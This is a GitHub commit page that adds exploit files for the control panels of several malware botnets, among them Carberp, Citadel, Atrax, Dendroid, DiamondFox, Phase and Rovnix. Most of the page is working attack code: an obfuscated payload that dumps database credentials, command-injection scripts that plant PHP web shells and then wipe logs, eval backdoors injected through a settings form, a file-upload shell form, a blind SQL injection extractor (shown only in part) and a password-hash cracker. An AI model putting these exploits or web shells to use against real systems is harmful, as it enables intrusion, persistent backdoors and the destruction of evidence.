Navigation Menu

Skip to content

Commit

Permalink
exploits from xyl2k
Browse files Browse the repository at this point in the history
  • Loading branch information
@misterch0c
misterch0c committed Jan 5, 2016
1 parent 039f59e commit 686d940
Show file tree
Hide file tree
Showing 11 changed files with 411 additions and 9 deletions.
56 changes: 56 additions & 0 deletions Banking/caberp.md
View file
@@ -0,0 +1,56 @@
#### Caberp


Type: Remote Code Execution

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>
```
54 changes: 53 additions & 1 deletion Banking/citadel.md
View file
@@ -1,6 +1,58 @@
#### Citadel

```
Type: SQLi
```
Vuln: http://localhost/cp.php?bots=1
```

Type: Remote Code Execution

Author: [Xylitol](https://twitter.com/Xylit0l)


```
import urllib
import urllib2
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box
def request(url, params=None, method='GET'):
if method == 'POST':
urllib2.urlopen(url, urllib.urlencode(params)).read()
elif method == 'GET':
if params == None:
urllib2.urlopen(url)
else:
urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()
def uploadShell(url, filename, payload):
data = {
'b' : 'tapz',
'p1' : 'faggot',
'p2' : 'hacker | echo "' + payload + '" >> ' + filename
}
request(url + 'test.php', data)
def shellExists(url):
return urllib.urlopen(url).getcode() == 200
def cleanLogs(url):
delete = {
'delete' : ''
}
request(URL + 'control.php', delete, 'POST')
URL = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD = '<?php phpinfo(); ?>'
uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'
if not shellExists(URL + FILENAME):
print '[-]', FILENAME, 'not found...'
else:
print '[+] Go to:', URL + FILENAME
cleanLogs(URL)
print '[~] Logs cleaned!'
```
98 changes: 98 additions & 0 deletions Http Botnets/atrax.md
View file
@@ -0,0 +1,98 @@
#### Atrax


Type: Shell Upload Vulnerability

Author: [Xylitol](https://twitter.com/Xylit0l)

```
import random
import string
import base64
import urllib
import urllib2
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>
BOT_MODE_INSERT = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN = 'e'
GET_PARAM_MODE = 'a' # GET PARAM
POST_PARAM_GUID = 'h' # POST PARAM
POST_PARAM_IP = 'i'
POST_PARAM_BUILDID = 'j'
POST_PARAM_PC = 'k'
POST_PARAM_OS = 'l'
POST_PARAM_ADMIN = 'm'
POST_PARAM_CPU = 'n'
POST_PARAM_GPU = 'o'
POST_PARAM_PLUGINNAME = 'q'
def request(url, get, post):
if not get == '':
url += '?' + get
encoded = {}
if not post == '':
for _ in post.split('&'):
data = _.split('=')
encoded[data[0]] = data[1]
encoded = urllib.urlencode(encoded)
request = urllib2.Request(url, encoded)
response = urllib2.urlopen(request)
page = response.read()
return page
def queryValue(key, value, next=True):
ret = key + '=' + value
if next:
ret += '&'
return ret
def randomString(length = 8):
return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
def createVictim(url, guid, ip):
get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
post = queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue(POST_PARAM_BUILDID, randomString())
post += queryValue(POST_PARAM_PC, randomString())
post += queryValue(POST_PARAM_OS, randomString())
post += queryValue(POST_PARAM_ADMIN, 'yes')
post += queryValue(POST_PARAM_CPU, randomString())
post += queryValue(POST_PARAM_GPU, randomString(), False)
return request(url + 'auth.php', get, post)
def exploit(url, guid, ip, file, payload):
get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
post += queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue('am', randomString())
post += queryValue('ad', file)
post += queryValue('ab', base64.b64encode(payload))
post += queryValue('ai', '18', False)
request(url + 'auth.php', get, post)
def testExploit(url, guid, ip):
file = randomString() + '.php'
payload = '<?php echo("1337"); ?>'
exploit(url, guid, ip, file, payload)
return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
guid = '7461707a7461707a7461707a7461707a'
ip = '91.224.13.103'
file = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
print '[-] Cannot create victim...'
else:
print '[~] Victim created/updated...'
if testExploit(url, guid, ip):
exploit(url, guid, ip, file, payload)
print '[+] Exploit uploaded!'
print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
else:
print '[-] Cannot upload payload, maybe the plugin is not actived?'
```
37 changes: 37 additions & 0 deletions Http Botnets/dendroid.md
View file
@@ -0,0 +1,37 @@
#### Dendroid


Type: Remote Code Execution

Author: [Xylitol](https://twitter.com/Xylit0l)

```
import requests
# Add URL
# Set a PHP payload
# Go to http://website/config.php
URL = 'http://localhost/Panel/applysettings.php'
PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '"
data = {
'dbhost' : 'localhost',
'dbname' : 'dendroid',
'dbusername' : 'root',
'dbpassword' : '',
'username' : 'admin',
'password' : 'admin',
'postboxsize' : '10',
'devicetablerefr' : '10000',
'filetablerefr' : '10000',
'historyboxrefr' : '5000',
'botoffline' : '60',
'timezone' : "Europe/Brussels';" + PAYLOAD,
'messageboxscroll' : 'Yes',
}
headers = { 'Host': '127.0.0.1' }
req = requests.post(URL, data=data, headers=headers)
print 'HACKED!'
```
33 changes: 33 additions & 0 deletions Http Botnets/diamond.md
View file
@@ -0,0 +1,33 @@
#### Gorynych/DiamondFox v4.2.0.257


Type: File Upload Vulnerability

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<!DOCTYPE html>
<html>
<head>
<title>Gorynych v4.2.0.257- File Upload Vulnerability</title>
<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -->
</head>
<body>
<h1>&#9673; Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability &#9673;</h1>
<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upload1">
<input type="hidden" name="slots" value="1">
<input type="submit" value="PWN!"">
</form>
File naming convention:<br>
&#9733; file.log.php (go to logs/dump/file.log.php)<br>
&#9733; file.jpg.php (go to logs/scr/file.jpg.php)<br>
&#9733; file.LOG.php (go to logs/pass/file.LOG.php)<br>
&#9733; file.txt.php (go to logs/ftp/file.txt.php)<br>
&#9733; file.TXT.php (go to logs/rdp/file.TXT.php)<br>
&#9733; file.TxT.php (go to logs/mail/file.TxT.php)<br>
&#9733; file.html.php (go to logs/kyl/file.html.php)<br>
&#9733; file.wallet.php (go to logs/wallet/file.wallet.php)
</body>
</html>
```
55 changes: 55 additions & 0 deletions Http Botnets/phase.md
View file
@@ -0,0 +1,55 @@
#### Phase Botnet

Type: Blind SQL injection vulnerability

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<?php
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this :)
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
get_string('username');
get_string('password');
function get_length($field) {
$length = 1;
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
++$length;
}
echo($field . ' length: ' . $length . PHP_EOL);
return $length;
}
function get_string($field) {
$length = get_length($field);
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= chr(get_char($field, $i));
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
}
return $str;
}
function get_char($field, $id) {
$binary = '';
for ($i = 1; $i < 256; $i *= 2) {
if ($i == 128)
$binary = '0' . $binary;
else
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
```
55 changes: 55 additions & 0 deletions Http Botnets/rovnix.md
View file
@@ -0,0 +1,55 @@
#### Rovnix


Type: Hash Collision

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<?php
/**
* Defeat the weak hash function of Rovnix
* to get password from a hash.
*/
$HASH = 'fbff791ef0770855e599ea6f87d41653';
$value = getNumber($HASH);
$search = search($value, $HASH);
echo('Hash: ' . $HASH . '<br />');
echo('Value: ' . $value . '<br />');
echo('Search: ' . $search);
// Search an working (number) password
function search($value, $hash) {
$i = 0;
while (true) {
if (getHash($i) == $value)
return $i;
$i++;
}
}
// Get the hashed number
function getNumber($hash) {
$i = 0;
while (true) {
if (md5($i) == $hash)
return $i;
$i++;
}
}
// Hash function without final MD5 (return only numbers)
function getHash($hash) {
$salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%jkjJn@@j$r@!cdh*!@#$djl1J$r!j@o*$@duJxlJLEKJkJFKJEJ2$jkeJFJLEJFE';
return $hash + $salt + md5($salt) + md5($hash) + $salt[3];
}
?>
```

0 comments on commit 686d940

Please sign in to comment.